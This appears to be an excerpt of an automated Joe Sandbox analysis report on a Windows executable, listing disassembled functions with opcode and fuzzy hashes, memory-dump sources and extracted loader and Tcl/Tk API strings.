                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e75d751cc15dfd510e55d83c6141b0e8cb11d18cbed01e0c543b372a0114c593
                                                                                      • Instruction ID: 2b95364da92b26a795d57a21af260ce14cf31a4e46a9d3cecbb58fc1d7c11632
                                                                                      • Opcode Fuzzy Hash: e75d751cc15dfd510e55d83c6141b0e8cb11d18cbed01e0c543b372a0114c593
                                                                                      • Instruction Fuzzy Hash: 06C18D762181E08BD28AEB29E46947A73E1F78930DBD5806BEF87477C5C63CA414DB60
                                                                                      Function 00007FF7F3DE2C10 Relevance: .2, Instructions: 241COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: aa73bfa000bc8cd66a05f12d530b76a597660d7bda6a6781f52cf2f49ffced0b
                                                                                      • Instruction ID: 8796c4775724102ea6b4711c764cd178ce622ec9e778fbf941e1b96070d76eba
                                                                                      • Opcode Fuzzy Hash: aa73bfa000bc8cd66a05f12d530b76a597660d7bda6a6781f52cf2f49ffced0b
                                                                                      • Instruction Fuzzy Hash: 11B17E72908B5585E7A8AF69C05013CBFA0E749F48FA40235CB5E6B3D5CF39D481C7A6
                                                                                      Function 00007FF7F3DEE570 Relevance: .2, Instructions: 198COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9611c2e0762efa78d7f6da3d8515592aa8d86601c49200b7335873453b670326
                                                                                      • Instruction ID: 9ec7a50326e72c648eb3da816bd299455c310c6075a27c717bb2fe826acadd27
                                                                                      • Opcode Fuzzy Hash: 9611c2e0762efa78d7f6da3d8515592aa8d86601c49200b7335873453b670326
                                                                                      • Instruction Fuzzy Hash: 11812672A0878146D7B8EF59908037ABE91FB45794F804339DAAD1BBC5DF7CD4808B51
                                                                                      Function 00007FF7F3DF6418 Relevance: .2, Instructions: 183COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                      • String ID:
                                                                                      • API String ID: 3215553584-0
                                                                                      • Opcode ID: 21aaab296e2e64a79b20cf98ea2699a9ab0529386423cc159892306e5cd43e00
                                                                                      • Instruction ID: d19ecf6a07694de92a970829b8ee1b19c68cf4303948c21a4eb42eb575a46c9b
                                                                                      • Opcode Fuzzy Hash: 21aaab296e2e64a79b20cf98ea2699a9ab0529386423cc159892306e5cd43e00
                                                                                      • Instruction Fuzzy Hash: 29611822E0C25246F7E4AAF8949063CE684AF40760FD44239D63D6FFCDDE6DE84087A0
                                                                                      Function 00007FF7F3DE2164 Relevance: .1, Instructions: 146COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
                                                                                      • Instruction ID: fc0465b5dfed097d5d6809c1a56a267393387fb7df778b350a16f40333f69d87
                                                                                      • Opcode Fuzzy Hash: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
                                                                                      • Instruction Fuzzy Hash: 3651DB36A1865181E7A8AB69C44023C7BA1FB54B68F644331CE5C2B7D4CF3AE983C7D1
                                                                                      Function 00007FF7F3DE1944 Relevance: .1, Instructions: 146COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
                                                                                      • Instruction ID: 8f2a1c24a7a6ed98ca014aa88bec463153c1d256d51793798b21af49a040e540
                                                                                      • Opcode Fuzzy Hash: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
                                                                                      • Instruction Fuzzy Hash: 9651B976B1465181E7A89B69C44023CBBA4FB45B58F644331CEAD2B7D4CB3AE883C7D1
                                                                                      Function 00007FF7F3DE1D54 Relevance: .1, Instructions: 146COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
                                                                                      • Instruction ID: 0ddb65b8b603693cf271af245056839ea470e22eb88f36632d461e39dcaa57c7
                                                                                      • Opcode Fuzzy Hash: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
                                                                                      • Instruction Fuzzy Hash: 5751B936B1865181E7A89B69C0402387BA4EB45F58F644331DE5D2B7D4CB3AE893C7D1
                                                                                      Function 00007FF7F3DE1B50 Relevance: .1, Instructions: 145COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
                                                                                      • Instruction ID: d764abf1786bbe43ee9caf652a1e4465538d1e3835f1f3430cee5c7059a1cc68
                                                                                      • Opcode Fuzzy Hash: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
                                                                                      • Instruction Fuzzy Hash: 2E51D432B1865181E7A99F68C04023CABA4EB45B58FA44231DE5C6B7D4DF3AE8C3C791
                                                                                      Function 00007FF7F3DE1F60 Relevance: .1, Instructions: 145COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
                                                                                      • Instruction ID: 271c10446fef1b8845aa402920efc6e731eb1477bb5d029139dc478852c93668
                                                                                      • Opcode Fuzzy Hash: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
                                                                                      • Instruction Fuzzy Hash: 5251A537B1865585E7A8AB69C050338BBA0EB44F58F644231CE5C2B7D5CB3AE893C7D1
                                                                                      Function 00007FF7F3DE1740 Relevance: .1, Instructions: 145COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
                                                                                      • Instruction ID: 22bcf95fcafdd8953d5149a49afe1526d642d8a63037afb593aa63944b2e6a11
                                                                                      • Opcode Fuzzy Hash: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
                                                                                      • Instruction Fuzzy Hash: C451C636B1865181E7A8AB69C040238BBA5EB45F58F644231CE5D2B7D4CF3AEC83C7D1
                                                                                      Function 00007FF7F3DE5D30 Relevance: .1, Instructions: 138COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                      • Instruction ID: cae257b52e8612174e525b5274c84ca7c84b6a3ca155eed4536c677ec6b2967a
                                                                                      • Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                      • Instruction Fuzzy Hash: D241836280978E05EBED99D80524674AE829F12BE0F981374DDB97F3C3C90DE5C68262
                                                                                      Function 00007FF7F3DE9EA0 Relevance: .1, Instructions: 126COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorFreeHeapLast
                                                                                      • String ID:
                                                                                      • API String ID: 485612231-0
                                                                                      • Opcode ID: 1c7003d4bfacf113f63307708dabd17e5ede6cda44dccf6aa27d02a6b9ea0481
                                                                                      • Instruction ID: 1ff1c62d222bb2ad9b95b14c477e20b6bca722301d51f24271b91997921df612
                                                                                      • Opcode Fuzzy Hash: 1c7003d4bfacf113f63307708dabd17e5ede6cda44dccf6aa27d02a6b9ea0481
                                                                                      • Instruction Fuzzy Hash: FF415CB2714E4582EF48DF66DA14169B391FB48FD0B899032DE1DAFB98DE3CC4418340
                                                                                      Function 00007FF7F3DE80E4 Relevance: .1, Instructions: 98COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2b8cddb4ee5dd57f1c7573491c8f445712dd312cb7e9e547cfd0f9c072f4c0c7
                                                                                      • Instruction ID: 914d8d71d4d5291e5f6e1b6c762807e1073d0a7b168b6c4ae57decca4085c48a
                                                                                      • Opcode Fuzzy Hash: 2b8cddb4ee5dd57f1c7573491c8f445712dd312cb7e9e547cfd0f9c072f4c0c7
                                                                                      • Instruction Fuzzy Hash: AF31F632B08B4241E7A8AF65A88013DFAD4AF85BD0F944338EA6D6BBD5DF3CD0418755
                                                                                      Function 00007FF7F3DF9570 Relevance: .0, Instructions: 32COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5d3ac10822f6242d2b374fc0e1218152d8e80c351f0dfcd4fab21387456caa74
                                                                                      • Instruction ID: 799c7b8f921a849aa24c168a4c3c8aa7332cb83310d7d0a8b12a33ff47d5b973
                                                                                      • Opcode Fuzzy Hash: 5d3ac10822f6242d2b374fc0e1218152d8e80c351f0dfcd4fab21387456caa74
                                                                                      • Instruction Fuzzy Hash: 34F0C871B182928BDBE8AF68A802629B7D0FB183C0FC4807AD5AD87B44CA3CD0518F54
                                                                                      Function 00007FF7F3DDD30C Relevance: .0, Instructions: 2COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3c3909751b2697c6481bc0460501d6177e5cf72f77169ad8285d6e0cd944102a
                                                                                      • Instruction ID: 633ffe06156be9ae315cf2cf7e6ef6c4ed8503034882080e74de376f159e00a8
                                                                                      • Opcode Fuzzy Hash: 3c3909751b2697c6481bc0460501d6177e5cf72f77169ad8285d6e0cd944102a
                                                                                      • Instruction Fuzzy Hash: 28A00121D4D80AD4EB84AB90A890525A621BB54300BC00031E42D694E89E2CA50492A0
                                                                                      Function 00007FF7F3DD76C0 Relevance: 177.1, APIs: 66, Strings: 35, Instructions: 314libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressErrorLastProc
                                                                                      • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                      • API String ID: 199729137-3427451314
                                                                                      • Opcode ID: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
                                                                                      • Instruction ID: 2c5970798314cd67353c4770c197becfaa6e639420e33319c842569f418bac22
                                                                                      • Opcode Fuzzy Hash: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
                                                                                      • Instruction Fuzzy Hash: 0402AB2490EB0791EBD5BFA5A890578E361AF09755FC41071D83E2A2E8EF3CB15992F0
                                                                                      Function 00007FF7F3DD81D0 Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 117COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00007FF7F3DD9390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7F3DD45F4,00000000,00007FF7F3DD1985), ref: 00007FF7F3DD93C9
                                                                                      • ExpandEnvironmentStringsW.KERNEL32(?,00007FF7F3DD86B7,?,?,00000000,00007FF7F3DD3CBB), ref: 00007FF7F3DD822C
                                                                                        • Part of subcall function 00007FF7F3DD2810: MessageBoxW.USER32 ref: 00007FF7F3DD28EA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                      • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                      • API String ID: 1662231829-930877121
                                                                                      • Opcode ID: 34679b23be2e6a85bad270fe565fa16c5e09c528fb77942a9d4832d630ea4d55
                                                                                      • Instruction ID: a8701849d75f3fde35995c81857c6491dccaffc4380616e41407ab6daf436257
                                                                                      • Opcode Fuzzy Hash: 34679b23be2e6a85bad270fe565fa16c5e09c528fb77942a9d4832d630ea4d55
                                                                                      • Instruction Fuzzy Hash: BB518711A2D68291FBD1BBA5D8516B9F250AF94780FC44431DA2EAE7D9EE3CE50483F0
                                                                                      Function 00007FF7F3DD2180 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
